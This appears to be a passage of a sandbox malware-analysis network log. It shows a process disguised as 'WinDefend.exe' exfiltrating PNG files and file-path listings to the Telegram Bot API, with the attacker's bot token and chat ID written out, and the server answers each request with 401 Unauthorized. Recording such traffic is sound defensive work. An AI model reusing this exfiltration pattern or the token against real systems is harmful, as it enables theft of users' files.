2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: a4 9a a4 b2 a4 ca a4 e2 a4 fa 92 b7 6f 38 e2 d8 fb fd 3b 8e cd cf cb 2b bb 77 4f 5e 74 f1 0c df aa 6c 6e 96 22 da 92 95 f5 c3 ca 95 26 82 95 97 4c 24 88 05 00 20 12 b9 74 ab aa aa ba 7f ff be f7 a3 22 7d ce e6 d0 d6 d6 f6 e8 d1 a3 92 92 12 79 af ff 1e 0c 4d 4d 4d 7a 05 29 6f d7 5b a5 0f 63 bd f8 79 fa f4 69 69 69 69 54 37 ec 62 5b 67 c0 90 63 a4 ba ba ba a8 a8 e8 dc b9 73 b2 23 b9 77 3f bd 75 ae 8f d8 94 7d ac ac ac ac d7 23 ab d7 3d b9 b3 b3 53 0e 13 59 94 1c 3e 31 af b9 de 4c 37 a9 64 df 8a e1 e0 8d f3 8d ee 53 81 94 e7 93 27 4f e4 ec d7 57 85 20 b5 59 51 51 f1 c7 1f 7f 98 6c 5b 56 46 a6 c4 b6 75 69 7a 1a 47 5f 9d a9 12 7e 58 c5 b0 07 ca 5b 64 25 7f ff fd 77 fb a3 5f be 7c 29 47 41 54 bb b1 d1 d8 d8 28 1b 12 f6 99 0e a9 3c 60 65 35 ee de bd 2b 9b 66 3f Data Ascii: o8;+wO^tln"&L$ t"}yMMMz)o[cyiiiiT7b[gcs#w?u}#=SY>1L7dS'OW YQQl[VFuizG_~X[d%w_\|)GAT(<`e5+f?
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: c4 b1 e9 5e 92 9c eb 7a ad 47 53 53 c4 b1 6e 69 11 c7 9a 76 ca a2 45 8b ec 89 6d 6d 6d 72 79 6c 7a 70 ea b0 ba 95 95 95 ee 0b 75 47 1c 2b f3 48 6b c8 be 54 96 2b e7 ec ec 6c 73 ed 9d 9f 9f 1f f6 fa fc d2 a5 4b ef ba 23 2b fd 51 7b eb 5e bf 7e 5d 7f cc cb cb 0b bb 5d fa 5b 3b 5d bb 79 f3 a6 3d 0e b3 b6 65 3c 06 04 96 b5 b5 d7 e7 eb bf d9 a3 25 4b ab 67 f9 f2 e5 f6 6c b2 ed 7e 76 24 8f 38 56 98 51 8b b5 11 74 ed da b5 a5 4b 97 da 25 23 e5 1f b6 d7 f2 95 2b 57 ec 96 8b bd da e2 e0 c1 83 66 4e 29 cf 1f 7f fc d1 5e 73 69 43 35 34 34 f4 83 63 2d 9e 38 76 da b4 69 ee 79 92 1d c7 a6 80 d4 b5 6e 42 63 63 63 02 cb 59 97 79 f6 ec 59 6e 4b 21 c5 47 2e 00 00 00 fa 44 5f c6 b1 26 11 bc 7c f9 b2 3d bd a5 a5 c5 91 41 da ca cb cb dd b7 39 c2 c6 b1 d2 4a 5f b4 68 d1 3f 23 Data Ascii: ^zGSSnivEmmmrylzpuG+HkT+lsK#+Q{^~]][;]y=e<%Kgl~v$8VQtK%#+WfN)^siC544c-8viynBcccYyYnK!G.D_&\|=A9J_h?#
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: 9b 7b 38 59 77 1c 6b 96 79 e0 c0 81 23 47 8e 48 43 e6 ee dd bb 8e ef 2b 4b c3 c4 f4 51 8e bf ed 1c cc 63 2d fe 38 d6 f4 4f 0d 85 42 6d 6d 6d 8e 38 f6 f5 eb d7 a3 47 8f d6 29 c3 87 0f 97 bd 5d 0a 5c f6 2e 5d 94 a3 f7 ea f4 e9 d3 ed a1 89 35 01 1d 34 68 90 fd 07 c2 1d c7 9a 6e b5 42 16 6b 47 bf b2 43 9a 37 9a e1 8b c5 8c 19 33 b6 6f df 2e f5 2e 0d 6a 0d 68 7b 8d 63 cd 44 69 fc ee e9 29 3b 3b 7b ff fe fd bf fc f2 8b c7 09 2a 6c 1c 6b 26 7a c7 b1 df 7d f7 1d 77 b2 d2 57 92 ee 4e 10 c7 02 00 00 04 5f b0 06 2b 96 16 af 19 12 ca 11 07 46 e2 8e 63 e5 8d 26 c9 0b fb 75 d4 84 c7 b1 e6 eb ea 3e 53 e4 14 c7 b1 e6 0b e6 d2 9a 35 77 0d dc 71 6c 73 73 b3 29 37 f7 0d d0 a8 e2 d8 68 0b c4 ad aa aa ca d4 ac 6c 5d 92 da 3c c9 cb 62 df 11 c7 b2 a5 6c 69 ac 5b 17 69 7a 7b 7b Data Ascii: {8Ywky#GHC+KQc-8OBmmm8G)]\.]54hnBkGC73o..jh{cDi);;{*lk&z}wWN_+Fc&u>S5wqlss)7hl]<bli[iz{{
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: 1d e0 ea 00 10 59 d7 5a 61 61 61 41 41 81 c3 e1 a0 ab 81 48 21 17 ac 5c b6 72 f1 d2 15 00 00 00 e1 8c 67 c7 02 41 c1 2f 25 01 80 b1 1d e0 ea 00 10 59 d7 5a 45 45 45 41 41 41 6f 6f 2f 5d 0d 44 8a 9e 9e 1e b9 6c e5 e2 a5 2b 00 00 00 c2 19 71 2c 10 14 fc 52 12 00 18 db 01 ae 0e 00 91 75 ad 35 34 34 14 14 14 54 55 55 d1 d5 40 a4 50 ff 8a e2 d1 a3 47 74 05 00 00 40 38 e3 d9 b1 40 50 f0 4b 49 00 60 6c 07 b8 3a 00 44 d6 b5 66 b7 db af 5d bb 56 50 50 d0 d7 d7 47 6f 03 e1 af bb bb 5b 2e d8 eb d7 af cb c5 4b 6f 00 00 00 84 33 e2 58 00 00 00 00 00 30 a9 a9 a9 49 3d 87 92 44 16 08 73 bd bd bd ea 79 cf cd cd cd f4 06 00 00 40 98 23 8e 05 00 00 00 00 00 d3 ca ca ca 0a a6 d4 d4 d4 74 77 77 8f 8e 8e d2 27 40 f8 b0 db ed 72 61 ca e5 a9 ae 53 b9 60 e9 13 00 00 80 f0 37 2b Data Ascii: YZaaaAAH!\rgA/%YZEEEAAAoo/]Dl+q,Ru544TUU@PGt@8@PKI`l:Df]VPPGo[.Ko3X0I=Dsy@#tww'@raS`7+
2024-05-23 13:35:24 UTC	4096	OUT	Data Raw: 3e fd d5 77 b8 78 f4 c9 3e 57 f7 4a e3 03 7e 81 1f 3c 78 50 e5 76 af bc f2 4a 65 65 a5 0e fc 7c ac 64 2b 9f 94 54 7e c6 13 15 13 ae 5e bd 5a 6f 29 2c 2c 34 be d7 e9 74 ea 67 9a aa 39 b8 37 6e dc 78 f9 e5 97 4d fb 91 3a f2 05 30 46 7a e5 e5 e5 fa d5 9c 9c 9c 65 cb 96 99 9e 77 5b 56 56 e6 de 54 f9 86 c8 08 a6 8f a8 dd b9 73 47 d7 a9 a8 a8 30 35 40 ea a7 a6 a6 3a 1c 8e 05 9c bb 6f 01 3f 96 74 85 de 98 97 97 27 5b 96 2c 59 e2 f1 2d 6f bc f1 86 bc fa f8 f1 63 bd 65 c7 8e 1d 6a 27 32 bc eb 8d d7 ae 5d d3 ab 19 2b 6f be f9 a6 29 2b b5 5a ad 9f 7f fe f9 33 3e b5 b5 b5 f9 e8 87 07 0f 1e c8 6e 4d 6f 59 b1 62 45 5d 5d 9d b1 da 7c 1b 16 10 b1 f8 ec d8 bd 7b f7 2e 09 3f bf 7c 37 21 48 71 6c 5c e2 3d e2 58 e2 58 00 00 00 00 00 00 20 ac 10 c7 22 9a e2 d8 53 15 ce d0 4c Data Ascii: >wx>WJ~<xPvJee\|d+T~^Zo),,4tg97nxM:0Fzew[VVTsG05@:o?t'[,Y-ocej'2]+o)+Z3>nMoYbE]]\|{.?\|7!Hql\=XX "SL
2024-05-23 13:35:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:25 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:25 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
169	192.168.2.5	61217	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:24 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="69259242-5aff-4858-9012-5d6121312c19" Host: api.telegram.org Content-Length: 1459 Expect: 100-continue
2024-05-23 13:35:25 UTC	40	OUT	Data Raw: 2d 2d 36 39 32 35 39 32 34 32 2d 35 61 66 66 2d 34 38 35 38 2d 39 30 31 32 2d 35 64 36 31 32 31 33 31 32 63 31 39 0d 0a Data Ascii: --69259242-5aff-4858-9012-5d6121312c19
2024-05-23 13:35:25 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 65 61 72 63 68 45 6d 61 69 6c 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 65 61 72 63 68 45 6d 61 69 6c 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=SearchEmail2x.png; filename*=utf-8''SearchEmail2x.png
2024-05-23 13:35:25 UTC	1121	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 01 04 7d 4a 62 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 18 49 44 41 54 58 09 bd 97 49 48 95 51 14 c7 f5 39 24 da 6b 22 a1 81 76 15 06 a1 82 43 ab 34 8a 20 28 88 08 9a 77 51 2d 8a 28 24 22 22 b2 4d 8b 20 30 a8 a0 82 36 4d b4 28 0a 5a 14 98 50 ee 9c 10 c1 88 6c 51 64 03 85 45 83 a2 a6 be 7e e7 7a ef e7 79 d7 ef bd f7 f5 a0 3e b8 ef 9e f9 fe ef 39 77 7a 39 39 e9 be 8e 8e 8e d9 31 6d 90 48 24 36 e7 8a a0 b7 b7 77 c1 e0 e0 e0 76 c8 26 6d 30 49 b7 b5 b5 25 84 a2 af 37 12 88 e6 49 95 fa 45 f8 c3 b1 26 28 c3 6d 9c 98 98 78 54 52 52 12 27 f8 83 dc dc dc ba 9a 9a 9a 42 67 24 a3 ce 0c 18 4b b4 b7 b7 bf 09 64 30 13 c1 a0 48 a1 0d 90 c0 20 15 11 c9 d0 80 14 cb bc bc bc Data Ascii: PNGIHDR }JbgAMAaIDATXIHQ9$k"vC4 (wQ-($""M 06M(ZPlQdE~zy>9wz991mH$6wv&m0I%7IE&(mxTRR'Bg$Kd0H
2024-05-23 13:35:25 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 39 32 35 39 32 34 32 2d 35 61 66 66 2d 34 38 35 38 2d 39 30 31 32 2d 35 64 36 31 32 31 33 31 32 63 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --69259242-5aff-4858-9012-5d6121312c19Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:25 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:25 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 39 32 35 39 32 34 32 2d 35 61 66 66 2d 34 38 35 38 2d 39 30 31 32 2d 35 64 36 31 32 31 33 31 32 63 31 39 2d 2d 0d 0a Data Ascii: --69259242-5aff-4858-9012-5d6121312c19--
2024-05-23 13:35:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:25 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:25 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
170	192.168.2.5	61218	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:25 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b6187d24-6b94-4391-966b-58c47c6686ae" Host: api.telegram.org Content-Length: 5694 Expect: 100-continue
2024-05-23 13:35:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:25 UTC	40	OUT	Data Raw: 2d 2d 62 36 31 38 37 64 32 34 2d 36 62 39 34 2d 34 33 39 31 2d 39 36 36 62 2d 35 38 63 34 37 63 36 36 38 36 61 65 0d 0a Data Ascii: --b6187d24-6b94-4391-966b-58c47c6686ae
2024-05-23 13:35:25 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:35:25 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 14 c7 49 44 41 54 78 9c ed 9d 7b 94 5d 55 7d c7 bf df bd cf 7d cd 23 0f 42 c8 6b 08 41 42 03 41 c5 90 20 16 12 32 93 88 8a d2 98 a5 24 d8 65 57 5b b4 b2 58 6d ad 56 a3 54 97 c8 e0 a3 3e 96 ad 88 8a 46 41 b0 ab a8 4d ac 56 41 a4 24 93 07 46 29 92 07 48 55 c0 14 42 02 79 63 32 ef 7b ef d9 7b ff fa c7 39 e7 ce bd 93 3b af 64 1e f7 ce 9c cf ca e4 35 f7 dc d9 f7 fc 7e fb b7 bf bf df 7e 1c 20 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 66 bc c1 d3 bd 50 82 6b b9 b1 e8 3d 7e 07 48 33 e0 86 a5 65 31 65 91 66 28 2c 2c b2 db 1a 08 08 21 20 a3 d3 00 80 5b 01 af bf ef 6f 00 f4 a8 34 66 82 20 00 65 43 ff f7 74 6b 33 3c Data Ascii: PNGIHDR>aIDATx{]U}}#BkABA 2$eW[XmVT>FAMVA$F)HUByc2{{9;d5~~ &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&fPk=~H3e1ef(,,! [o4f eCtk3<
2024-05-23 13:35:25 UTC	1280	OUT	Data Raw: a1 ec 49 18 6d 2a d1 01 00 04 55 d0 e8 f9 02 d3 5b 76 dd 96 f5 cd 3b 2a 2a 4b e8 47 e5 77 99 fc db 66 6c d9 f5 25 a0 67 9f c1 a8 b7 6f 90 54 ac 03 00 40 73 d1 3a fe 99 db 77 3f 50 31 59 c2 00 2a bf 61 fb 53 5b 8b f7 19 8c 5a bb 4e 83 8a 76 80 88 8a c9 12 86 a6 f2 ed 88 b5 63 18 a9 0a 07 00 2a 24 4b 28 a7 f2 9d fb bf be 54 7e 35 50 35 0e 00 8c 61 96 50 46 e5 d7 6b ad b3 56 7e 4c 6d af ae 64 95 3f 10 55 e5 00 21 a3 9b 25 14 84 1e 21 80 49 2a ea a4 52 b9 2e eb 3e 36 ad e5 89 77 4c df b4 e7 60 73 05 ab fc 81 a8 46 07 00 30 0a 59 42 2f 95 4f 88 99 e4 69 4f 9c ec ed f0 f3 ab ce de f2 c4 e7 81 40 e5 57 f3 93 d0 aa d6 01 80 11 cc 12 8a 54 3e 00 ab 04 4c 6b 95 e8 b0 f6 27 1d dd 7e e3 9c ed 4f 6e aa 16 95 3f 10 55 ed 00 11 fd 65 09 22 62 07 9d 25 94 51 f9 49 52 0b Data Ascii: ImU[v;KGwfl%goT@s:w?P1YaS[ZNvc$K(T~5P5aPFkV~Lmd?U!%!IR.>6wL`sF0YB/OiO@WT>Lk'~On?Ue"b%QIR
2024-05-23 13:35:26 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 62 36 31 38 37 64 32 34 2d 36 62 39 34 2d 34 33 39 31 2d 39 36 36 62 2d 35 38 63 34 37 63 36 36 38 36 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --b6187d24-6b94-4391-966b-58c47c6686aeContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:26 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:26 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 62 36 31 38 37 64 32 34 2d 36 62 39 34 2d 34 33 39 31 2d 39 36 36 62 2d 35 38 63 34 37 63 36 36 38 36 61 65 2d 2d 0d 0a Data Ascii: --b6187d24-6b94-4391-966b-58c47c6686ae--
2024-05-23 13:35:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
171	192.168.2.5	61219	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:26 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 199 Expect: 100-continue
2024-05-23 13:35:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:26 UTC	199	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+selection-actions.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cselection-actions.png%0ASize%3A+1+KB
2024-05-23 13:35:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
172	192.168.2.5	61221	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:26 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="db91fe51-47b6-4538-b745-983cacefeb67" Host: api.telegram.org Content-Length: 23689 Expect: 100-continue
2024-05-23 13:35:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:27 UTC	40	OUT	Data Raw: 2d 2d 64 62 39 31 66 65 35 31 2d 34 37 62 36 2d 34 35 33 38 2d 62 37 34 35 2d 39 38 33 63 61 63 65 66 65 62 36 37 0d 0a Data Ascii: --db91fe51-47b6-4538-b745-983cacefeb67
2024-05-23 13:35:27 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 38 32 33 62 64 61 63 35 38 37 61 65 32 32 34 62 66 33 36 36 38 39 36 30 30 32 38 31 61 36 39 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 38 32 33 62 64 61 63 35 38 37 61 65 32 32 34 62 66 33 36 36 38 39 36 30 30 32 38 31 61 36 39 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=6823bdac587ae224bf36689600281a69.png; filename*=utf-8''6823bdac587ae224bf36689600281a69.png
2024-05-23 13:35:27 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 48 00 00 01 4e 08 02 00 00 00 f2 cd 75 78 00 00 00 09 70 48 59 73 00 00 17 11 00 00 17 11 01 ca 26 f3 3f 00 00 20 00 49 44 41 54 78 9c ec bd 7f 74 1b e7 79 e7 fb 0c 66 00 10 24 30 a4 28 c9 b2 c4 71 e4 46 69 15 22 6d 5c c7 ca 02 dd d4 9b 38 7b c1 ed ae d6 f6 d6 60 b7 2b 2b bb 6b 32 b9 a5 fc 47 85 b6 37 d4 b9 77 8f 98 3d 1b e8 9c de 23 f6 9c 06 ba 7f 58 bc 5b 13 de 7b ea a8 bb 97 f0 36 71 d5 cd 05 9a c4 5e 37 2d 90 c8 f1 3a bb 06 a2 a4 ee ca cd d0 92 2d 89 12 07 20 48 02 18 cc fd e3 21 5f 8d 66 80 21 88 df 04 9f 8f 7d 74 c0 c1 60 e6 c5 00 78 bf f3 3c ef f3 83 4b fd 58 06 82 20 88 86 b9 f1 7e e1 67 7f b7 fe c1 fb 45 eb dd 5c fd dc 81 43 8e 87 0e 3b 07 07 85 66 9d 9a b3 71 bc 8d 07 ae fa 1e 1a 94 cb e5 Data Ascii: PNGIHDRHNuxpHYs&? IDATxtyf$0(qFi"m\8{`++k2G7w=#X[{6q^7-:- H!_f!}t`x<KX ~gE\C;fq
2024-05-23 13:35:27 UTC	4096	OUT	Data Raw: 00 08 82 20 7a 9c ee 12 36 68 bd b6 51 7e 1b 41 10 44 6f d3 75 c2 06 d5 b5 cd 51 57 37 c6 6a da 76 f3 83 06 87 49 10 04 41 74 23 5d da e2 05 b5 6d 78 78 58 b0 df 1b e1 9e a1 a1 a5 a5 a5 e2 f6 3b 23 a0 b6 e9 83 47 d4 12 bc fb 63 6e 7d 4d 93 0e 37 6b c8 1d 63 7d 0d 30 09 bd 54 82 fc ca 7d 4f a9 25 58 c9 6d af 6e 5b a9 04 f5 99 b3 7b 03 30 2c d6 f3 42 82 20 88 e6 d2 a5 c2 06 95 b4 0d 73 b7 1b d1 b6 bf b9 7a 9f 13 52 be c6 ad e4 b4 8f 1d 85 9d d2 c2 2d 9f 83 95 15 58 5f 83 95 1c a8 25 4e b9 db e9 01 11 04 41 74 1f 5d 3d a3 57 d3 b6 9b 37 6f 96 35 cd fa b5 66 98 dd a6 d7 b6 3b b7 b8 1f e5 e0 e8 27 ba b4 85 9b 5a 82 e5 bb 90 5d 86 95 1c c9 18 41 10 44 4d 74 b5 b0 c1 a6 b6 ed dd b7 97 55 b5 60 76 5b 1d da c6 0b f0 89 47 b4 6b ef c2 cd 1b f7 1c 74 eb 6b f0 a3 37 Data Ascii: z6hQ~ADouQW7jvIAt#]mxxX;#Gcn}M7kc}0T}O%Xmn[{0,B szR-X_%NAt]=W7o5f;'Z]ADMtU`v[Gktk7
2024-05-23 13:35:27 UTC	4096	OUT	Data Raw: 89 a1 d2 55 53 08 87 cf 05 83 41 73 0a 04 36 ac 01 80 74 3a bd b8 b8 38 3a 3a 4a f5 47 b6 a4 67 85 0d 00 8a a5 d2 f2 f2 f2 d0 9e 7b a5 ae 70 e1 6d b7 69 9b 5d 10 38 db 3d 9f b3 8d e3 58 5e 30 3e 6a 00 00 20 00 49 44 41 54 b6 9f 05 36 ce 56 cb 6e 0c 87 a3 4d 9e 5e bf df a7 af f0 5b 91 6a 25 fc 51 3c 32 99 0c ab c5 85 b0 49 0a 6b e3 a2 ff 2d 18 7c 06 8f 13 0e 87 2f 5d fa 3a ce 92 e6 02 8f 4c b4 cc 9e 4f 0c 8c d4 9f 28 1c 3e 97 c9 64 58 e1 0f 3d b8 5e 85 c5 44 82 c1 45 74 7b 9e 38 f1 2c ee 89 d1 19 75 dc d1 b3 97 84 c3 e7 26 26 26 f4 46 18 8b 8e 49 a7 d3 fa 96 a1 b0 e9 6f 34 a4 76 49 92 14 0a 9d f6 fb fd 2c 93 a1 5a f0 08 52 bb f9 35 33 33 73 e2 c4 b3 a2 e8 a9 b1 88 06 9b fd f1 16 87 89 90 2c cb 68 53 ea 07 66 68 0f 5b 65 00 67 61 33 45 1a 2b 6c 31 bf f1 c4 Data Ascii: USAs6t:8::JGg{pmi]8=X^0>j IDAT6VnM^[j%Q<2Ik-\|/]:LO(>dX=^DEt{8,u&&&FIo4vI,ZR533s,hSfh[ega3E+l1
2024-05-23 13:35:27 UTC	4096	OUT	Data Raw: e6 5e 30 3f 05 db cf bb 32 5b 51 f5 35 0d 6f a4 15 2a dc 7f 47 d2 0d 06 19 bb 8c f1 78 a2 4a 7d 93 4c 38 1c 66 7d 62 e7 e6 2e 52 c6 db 0e 82 84 8d e8 76 58 38 1f b6 61 c3 ee 91 58 26 a3 9a 62 61 85 e2 e9 e9 33 98 f0 bb e5 29 70 19 89 35 32 d5 33 33 33 83 b1 94 53 53 a7 30 08 05 b7 27 12 09 73 fd 7b 73 af d1 8a a7 63 05 bd 0c 16 00 46 f1 a1 ad 96 4e 67 0c c7 67 a2 cb ce 52 4b b6 32 3b 45 38 7c 6e 62 62 42 6f bf b2 ac b2 74 3a 6d 6e 0e 6e 60 4b 35 4a 26 93 16 0d 01 58 dd ac 48 e4 c2 e2 e2 a2 cf e7 c3 be 7a 86 c1 a0 fd 64 b1 00 69 51 a0 b2 96 b5 43 06 3b 05 de 30 31 af af 2c cb 18 0a ab 0f 50 62 45 b4 89 9d 02 09 1b d1 d5 a0 53 11 00 24 49 9a 9b 7b 41 51 b2 53 53 a7 70 42 c7 7a 5a a2 e8 41 f7 a3 e1 85 e8 3b 4a a7 d3 53 53 cf 4b d2 08 9a 29 ac ed 8b be 5c d3 Data Ascii: ^0?2[Q5o*GxJ}L8f}b.RvX8aX&ba3)p52333SS0's{scFNggRK2;E8\|nbbBot:mnn`K5J&XHzdiQC;01,PbES$I{AQSSpBzZA;JSSK)\
2024-05-23 13:35:27 UTC	4096	OUT	Data Raw: 81 0c 85 8c 4d b6 a2 d1 28 00 78 bd a3 d5 1c 95 b0 9d 5e 27 04 41 b4 1a 72 45 12 3b 8c b9 b9 8b ec f1 c2 42 0c 6d 35 fd 46 d8 0c fd b0 06 4d 37 f6 e7 d8 58 20 12 b9 e0 f5 8e 32 b1 64 a0 fd 17 0a 85 1a 19 36 41 10 6d 83 84 e4 31 05 e2 00 00 1a ab 49 44 41 54 8d d8 61 54 14 ad 5a 94 0c 51 14 a5 a2 75 25 8a e2 dc dc 45 5c 42 63 9e 4c 0c fa 9f 9d 3d 5f ed 55 04 41 74 21 24 6c c4 ce c0 eb 1d 65 91 f7 0c 0c 03 41 47 a2 f9 25 7e bf df b0 25 9d ce 4c 4d 9d f2 7a 47 43 a1 90 3e 0c 84 85 4a 1a 58 58 88 2d 2c c4 d8 9f 15 c3 2c 09 82 e8 36 48 d8 88 9d 41 32 99 ca 66 2b 3b 09 15 45 31 3f 05 00 89 44 c2 10 c4 98 48 24 30 1f 2e 99 7c 56 9f a3 46 10 44 2f 41 c2 46 34 01 4d 07 c7 71 ad 38 45 2a 95 c2 d0 c4 8a cc cf 47 2b 6e 9f 98 78 4e ef 42 0c 85 4e 